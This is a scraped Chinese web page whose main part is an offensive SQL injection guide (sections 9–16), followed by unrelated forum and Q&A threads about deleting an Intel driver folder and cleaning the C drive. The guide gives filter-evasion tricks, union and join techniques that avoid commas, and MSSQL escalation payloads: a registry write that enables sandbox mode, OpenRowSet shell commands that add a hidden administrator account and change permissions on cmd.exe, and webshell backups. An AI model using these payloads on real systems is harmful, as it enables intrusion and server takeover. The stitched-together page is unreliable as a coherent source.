【值得一看】我花了整整一天时间整理的注入经验三
九、注入经验
1.有些人会过滤Select、Update、Delete这些关键字，但偏偏忘记区分大小写，所以大家可以用selecT这样尝试一下。
2.在猜不到字段名时，不妨看看网站上的登录表单，一般为了方便起见，字段名都与表单的输入框取相同的名字。
3.特别注意：地址栏的+号传入程序后解释为空格，%2B解释为+号，%25解释为%号，具体可以参考URLEncode的相关介绍。
4.用Get方法注入时，IIS会记录你所有的提交字符串，对Post方法做则不记录，所以能用Post的网址尽量不用Get。
猜解Access时只能用Ascii逐字解码法，SQLServer也可以用这种方法，只需要两者之间的区别即可，但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提高。
十、几个oracle注入的时候需要注意的地方
1)OracIe注入的时候，union语句的前后类型必须要匹配，要不然会查询不成功。oracle类型常见的有字符类型、数字类型和日期类型等
一般我们能用来做union查询并显示的是字符类型和数字类型。前面构造的 union select
1,2,3,4,5,6,7,8,9,10,11,,16
这个SQL语句的union后面全部是数字类型，而前面肯定有其它类型，所以是不能查询成功的。oracle并不会自己做数据类型转换，但是oracle中可以用NULL匹配所有的数据类型，所以我们等会可以先全部SeIect
NULL，然后再逐一检查union之前所select的类型。
2)select语句后面必须要跟表名，要不然也不能查询成功。"seIect 1,2,3 这样的语句在SQL
Server和MySQL中是可以成功执行的，但在oracIe中必须在后面加上表名．比如 select 1,2,3 from
admin才行。不过这也不是问题。oracle中有个默认谁都有权限的表 dua ．我们可以在select后面加上这个表名。
十一、偏移注射
关于Union偏移注射这个东西，最早貌似是lake2大黑客提出来的，以前一直当他是鸡肋，没去关注过，直到昨天遇到一个mysql
表，列都猜出来了，就差数据。因为他的参数是按“,”分割的，所以在注射的时候必须避开逗号，这样一来普通的union就用不成了，想暴力猜解也不行，因为substring也得用到逗号。无奈中想起join语句，偏移注射里面有一个很重要的技巧就是用join语句来控制字段数和数据显示的位置。麻烦的地方在于很多时候你根本不知道目标系统的环境，表里到底有多少列，数据类型什么的，怎么把他拼装到凑齐字段数，只能靠乱猜。
目标网站order by 7正常，order by 8无返回，那么一共是7个字段，按照通常的做法，应该是先and 1=2
union select
1,2,3,4,5,6,7#来看看情况，这里因为要避开逗号，就必须用到join语句。但是不知道用户表一共有几列，没有关系，我们可以用select
* from ((select username from users)as a join (select username from
users)as b on
a.username=b.username)，把select出部分字段的结果集当做一个表，然后来join到一起，这样只要把(select
username from users)as a重复7次，就可以把字段补齐。
上面的语句在mysql5里面可以正常执行，也可以用到union子句中，可是在mysql4里就报语法错误，看来4.x不支持这么复杂的嵌套。修改了一下：
select * from users as a join (select id from users) as b on
这样在4.1里可以正常执行，4.0因为不支持子语句，简单的说就是不支持()里带select，所以就木有办法鸟。
但是这样又有问题鸟，因为第一个select后面必须跟*，否则只会返回第一列。Mysql的join语句默认应该是inner
join，也就是内连接，我尝试换成left join或者right
join都不行，我记得mysql4应该是支持左连接和右连接的，搞不懂这里为什么行不通。这么一来又必需猜目标表的字段数了，而且目标表的字段数必需＜=语句里select出的字段数才行，也受显示数据字段的制约。好处就是不知道列名也没关系，可以用常数来代替，即select
1,2,3,4,5 union select * from users as a join (select 1 from users)
as b join (select 1 from users) as c on a.id=1
这样就完全避开了“,”，select出来的数据里可能会有很多重复，用distinct关键字过滤掉即可。
如果目标表的字段&前面选择的字段也没关系，因为必需保证最前面的字段是*，找一个字段少一点的表，即select
* from news as a join (select username from users) as
b，不过这个东西受到扫出来的表名，字段数，显示数据字段的制约，比较鸡肋了。
以上语句在mysql里测试成功，如果要在access或者mssql里使用，估计得另外调试。这个跟以前提出来那个偏移注射有些区别，也姑且算另外一种意义上的偏移注射吧。核心思想就是不断的join来补齐字段，从而避开。
最郁闷的是，最后竟然是用fckeditor搞定shell的，真没技术含量，一下午白研究了-_-
刚才在外面骑车的时候，突然想到，之前的语句select * from users as a join (select id
from users) as b on a.id=b.id前面必须要用到*是因为他并没有把这个select * from users
as a作为一个整体来解析，而是将users as a跟后面的join到一起了，即select * from (users as a
join (select id from users) as b on
a.id=b.id)，当然前面要用*，才能返回子语句里所有的列数了。
那么改写成select distinct * from (select 1 from users)as a join
(select 2 from users)as
b即可，然后依次像后面join补齐字段，最后把合适的地方换成用户名密码字段即可。mysql
4.1下测试成功，当然还是需要知道列名，呵呵
十二、猜出绝对路径进行差异备份
MSSQL数据库，还可以猜解网站存放在服务器中的根目录，通过差异备份备份出一句话，然后通过一句话木马客户端，上传脚本木马
如果一个网站注入点是MYSQL数据库，且是DB权限，或者是SA权限，能够列目录，那么就好办了，找到网站的目录，目录通常在D和E盘，备份个小马，上地址访问看看成功没，直接备份大马貌似不行，成功后，再输入大马内容
十三、通过注入点判断服务器的硬盘(分区)是否有访问权
，这个是注入点了的。现在我们用
SQL查询语句试试，C盘是否有访问权限。
and (select count(*) from
c:\autoexec.bat.c)&0
解释一下原理，其它AC数据库也是可以跨库查询。只要把 from 后的表名改成MDB数据库的硬盘绝对地址，后台加上个“.
”，接上要查的表名。例如，我要查D盘yqf.mdb中的ADMIN表：
and (select count(*) from d:\yqf.mdb.admin)&0
这样的语句，只要知道服务器硬盘其它数据库地址，ACCESS也能跨库查询。只是不知道地址，所以这个无关紧要。
and (select count(*) from
c:\autoexec.bat.c)&0
为什么说用这句可以判断是否有硬盘访问权限呢？大家都知道c:\autoexec.bat 是系统里自有的文件
无论哪个系统都有，而大家默认安装WINDOWS也是装在C盘，如果这样找不到文件的话，你可以试试其它盘。
现在我们提交：
and (select count(*) from
c:\autoexec.bat.c)&0
看到吧“不可识别的数据库格式'c:\AUTOEXEC.BAT'”报错信息，这样表示C盘有访问的权限。因为读到了AUTOEXEC.BAT把autoexec.bat当mdb数据库来处理了，所以就出现这样的错误提示。
现在我们用刚传的马去看看，呵，C盘有访问的权限吧。反之，如果没有访问权限，则会提示“c:\autoexec.bat
已被另一种方式打开，或者无权访问。”类似这样的提示，就是无权限访问了。
不过 autoexec.bat 可以测试，比如
c:\winnt\system32\cmd.exe，这些系统原有的文件都可以用来试。
十四、sa下的注入提权
虽说这年头讨论注射已经有点过时了,何况还是sa,但是在遇到我这种情况时,怕只有对injection研究高深的人才能突破吧...
本文讨论仍然是sql_server &Win32下的环境
是的,网络上已经发布了不少对于存储扩展应用的文档,但大部分是转载的,真正的原理少只又少
比如xp_subdirs 是如何获取目录的,是cracert tables 然后select反馈?
比如xp_cmdshell 是如何执行cmdshell的 dbo下的system继承?
比如sandboxmode下的net user是如何执行的,vbs调用的Shell()?
等等等等~~
sa的注射搞不下服务器真有点丢人,前提继承的是system :) ,至于其他牛角尖的环境就留给那些提问者吧
好了,说说一些特殊的环境吧
我们知道,各扩展存储都有调用他们对应的dll文件,例如: sp_OACreate调用odsole70.dll
xp_Cmdshell调用xplog70.dll
OK,进入正题:
dll文件被替换(因为dll是存储在sqlserver指定路径中的),比如sp_Oacreate被替换成xpweb70.dll
如何测试这种情况呢?可以exec sp_oraceate 'xxxxxxx'
提示:找不到sp_oraceate,对应的xx.dll没有此函数之类的
exec sp_dropextendedproc 'Sp_OACreate'
EXEC sp_addextendedproc Sp_OACreate ,@dllname ='上传dll'
情况2:xp_cmdhshell 或oacreate 无法利用时,采用sandboxmode(沙盒模式)
沙盒模式是通过access创建vbs 函数来执行shell的
具体语法就不说了前提是要能执行xp_regwrite 开启它
但这个利用方法有个局限性,它并不是通过cmd 来调用文件执行的,一般情况下是cmd.exe /c net user
这样,而他是net user 为什么呢? 这么理解吧 shell 'c:\windows\system32\net.exe
user'这样明白了吧,他只支持system32下的文件调用
而一般的dir ,echo,copy...等等都无法直接利用 可以尝试cmd /c dir..... 这样调用
由此引发情况3:
cmd,net被禁或更改,这是比较纳闷的问题,而且国内似乎也没有相关的解决办法
回到情况二,如上所述sandboxmode能调用system32下的文件,别忘记了有个cacls,有了它,那么网站的权限配置几乎为0了(再次强调,此法必须继承system权限,并且cmdshell等无法利用的情况下)
测试方法:Select * From
OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
shell("cacls c:\windows\system32\cmd.exe /t /e /c /g system:F")');
赋予cmd.exe的system用户所有权限
如果cmd被删或者net.exe,net1.exe被禁也可calcs c:\windows\system32\net.exe
/t /e /c /g system:f
相比而言sandboxmode的局限性比较小,只需要可以使用xp_regwrite 开启而一般站点管理员对xp_regwrite
的安全配置会比较马虎
xp_regwrite被删时,可EXEC sp_addextendedproc
xp_regwrite,'xpstar.dll'恢复
本文讨论的只是sqlserver 注射下的冰山一角，当是抛砖引玉吧~
十五、更高级的union select，跨库查询
这里说的是ACCESS的跨库，原文地址：
十六、SQL注射及提权经验
MSSQL数据库：
一般说来,无论谁拿到一个SA权限的注射点。都会很开心。
&1&直接执行net user等命令。
&2&可列目录但不能执行系统命令。
可以列出目录找出网站中可以利用的地方,比如ewebeditor,或者上传地址(试试是否有上传漏洞),等等。
或者找服务器下其他网站,然后入侵之。
如果无其他漏洞可以找到,那就利用备份得到一个webshell。
&3&无cmdshell
那就恢复之。详细请参考
;&& 中的6楼
&4&如果无法恢复cmdshell
可以参考下这篇文章。也就是利用的sp_oacreate来执行。可以通过5次shift来登陆3389
还可以利用sp_makewebtask直接在web目录里写入一句话马
还可以利用沙盒模式提权
EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
Select*From
OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
shell("net user aloner$ aloner /add")');--
;Select*From
OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
shell("net localgroup administrators aloner$ /add")');--
如果上述方法仍然不行,那就猜解出后台帐户和密码,然后登陆后台。看看有没什么可以利用的。
Db权限可以列出网站目录，然后备份。用一句话连接得到webshell.
如果可以列目录,但无法备份，也同样可以利用找其他漏洞来入侵。毕竟整个网站都可以被你浏览了。
然后就是猜解出后台帐户和密码登陆后台了。
还有一种就是关于一篇db权限备份到启动项得到系统权限。可以参考下这篇文章
public权限
此权限很多人不会利用。
但是可以列出目录的。
具体参考这篇文章
Mysql数据库:
Root权限下可以直接利用loadfile读取网站的文件内容(网站的配置信息)
--------------------------------------------------------
好了，文章完毕，文章中哪里不对的欢迎批评。
已投稿到：
以上网友发言只代表其个人观点，不代表新浪网的观点或立场。驱动更新后把C盘的“Intel”文件夹删除对运行有影响吗？ 口- 霏凡求助区 霏凡论坛 - 非凡软件站 - powered by phpwind.net
查看完整版本: [--
背景接：我更新了本本Mobile Intel(R) 965 Express Chipset Family显卡驱动到最新版本，在C盘产生了一个名为“Intel”的文件夹，其下只有一个 Logs 文件夹，该文件夹下只有一个文本文件 IntelGFX ，翻看其内容，应该是安装日志文件。在驱动更新后，我就把这个“Intel”文件夹删除了，然后运行半个月至今，期间总共出现2次显示失灵现象，就是显卡驱动提示出错，屏幕分辨率变得极低，系统提示我保存当前工作，并需要重新启动电脑！（重启电脑后，显示就正常了）不知是不是因为删除了这个“Intel”文件夹引起的，还是因为本身这个显卡驱动版本兼容性问题？
类似驱动安装文件安装驱动的时候会将打包的驱动先解压到C盘，然后再运行解压后的驱动继续安装直至安装完毕，安装好的驱动一般保存到Windows目录下，所以驱动安装文件安装驱动的时候在C盘根目录下产生的临时文件夹，比如楼主提到的在C盘产生了一个名为“Intel”的文件夹，可以删除，不会有任何影响。
Mobile Intel(R) 965 Express Chipset Family显卡驱动存放位置是在C:\Windows\System32\DriverStore\FileRepository C盘根目录下的intel文件夹里存放的是记录一些版本信息之类无关紧要的日志，没什么用，删除即可你可以找其他原因，但绝对不是删除此文件夹引起的
这个文件夹一般存的是驱动类文件 是安装临时文件，删除可以的
掉了文件或要用到驱动新安装、修复部分时候需要用到这个位置。正常情况使用不多。空间不是很紧张的不必要删，为了稳定。你的问题应该不是这个文件夹的问题。用驱动精灵重新安装下
我是从这里下载的驱动包，应该是该显卡的最新版驱动了。
最新的驱动不一定适合你的机器。我建议你到官网下载你主板型号对应的显示卡驱动。这样也许是最好的
把驱动删了再重新安装试试，驱动本身的问题可能性很大一般安装日志倒不会对性能有什么影响
这个“Intel”文件夹是驱动的临时文件，删除应该没有什么影响的显卡驱动提示出错应该是系统或者驱动的问题，最好不要使用驱动工具更新驱动，要使用官网的驱动
删了吧，这个没一点用。还占空间。我是直接删除。
之前的驱动就是联想官网上下载的，但是出现这里的问题了：（联想笔记本电脑）
删除吧，没有问题的。楼主用下官方驱动看看还有问题吗？
系统盘下Intel目录是安装Intel系列驱动时的默认解压路径，释放安装文件后自动安装，安装后这个文件夹内的都可以删除，和已安装的驱动没有影响。另外，你现在的现象你也猜到了，应该属于显卡驱动兼容性问题，建议下载其他版本的，显卡驱动并不是越新的越好，因为新版的驱动主要是解决新显卡使用并且兼容旧型号的显卡，既然是做兼容的，就有可能发生问题，建议找低点版本的显卡驱动使用。
空间倒影响不大，整个文件夹大小才70K而已
有些驱动是自解压程序，安装前默认会在c盘生成一个目录，解压完成后开始安装，删除后不会有影响。建议你换whql版本驱动试一试。
半月出现两次也正常，不知道是在用什么软件时出现?外置解码器系统各种离奇问题源头,第三方内置解码器的播放器用的都正常很，又省资源。
&&我是直接删除，完全没有影响
驱动一般在系统盘:\windows\system32\drivers下，那个文件夹应该是安装过程中产生的临时文件夹，删除没什么事
这个文件夹可以删除，你的电脑问题应该是驱动问题，在官网找你这款机子对应的驱动安装即可
前天我又重新安装了一遍驱动（驱动版本还是这个14.37.4.5218），同时没删C盘本目录下的“Intel”文件夹，看看效果如何！至少到目前为止，还没出现异常！
{Intel}代表的是不仅仅是主板/集成显卡，个别主板还有官方携带的磁盘快速存贮软件等。。。装驱动的时候记住只装Intel主板芯片组跟Intel集成显卡等的驱动即可，如果在C:\根目录留下该文件夹直接删除即可。
查看完整版本: [--
Powered by
Code & 2003-08
Time 0.023292 second(s),query:3 Gzip enabledYou can看过本文的人还看过:
本类人气榜
本月浏览榜电脑C盘磁盘已满~~怎么办啊？_百度知道
电脑C盘磁盘已满~~怎么办啊？
还有就是（WINDOWS）文件夹里有的程序和写字版的名字是蓝色的？一般都是黑色啊，会不会是病毒带的啊？？？
提问者采纳
装满了就清理一下，在C盘上点右键-属性-磁盘清理，选中要清理的内容清理一下，最好把放在C盘的一些无关紧要的东西移到别的盘去。至于蓝色名字的文件，别担心，那是系统为了节省空间自动压缩的文件，不用理会。
提问者评价
谢谢~~已经解决了
其他类似问题
13人觉得有用
电脑c盘的相关知识
按默认排序
其他2条回答
格掉，把没用的东西删掉，以后装东西不要往C盘里放
哪个叫你什么东东都装C盘。。哪个蓝色的没有事！~~
您可能关注的推广
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁请问怎样优化C盘？_百度知道
请问怎样优化C盘？
我电脑C盘系统盘7G目前剩1G盘我装系统其程序文件我放其硬盘我想删除C盘文件释放空间怕重要系统文件给删除破坏系统请问释放C盘空间关紧要文件给删除
提问者采纳
优化师看便功能齐全经使用造系统稳定C盘优化其实并复杂主要几点：1.转移页面文件WINDOWS装页面文件默认都C盘尽量页面文件放其区右键点我电脑-属性-高级-点面设置-高级-更改2.经清理临文件浏览网页、编辑文档等操作都让C盘留堆每用临文件间久占用空间用恶意软件清理助手清理临文件3.定期清理磁盘碎片磁盘碎片造系统运行缓慢C盘空间足原频繁C盘进行读写操作再加页面文件C盘产连续碎片文件
其他类似问题
按默认排序
其他2条回答
与其要优化我建议重装系统反C盘别东西要删丢怕装完建议再装原精灵或者冰点类原软件每关机自恢复C盘随便用担C盘垃圾堆积
用优化大师可以！
您可能关注的推广回答者：
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁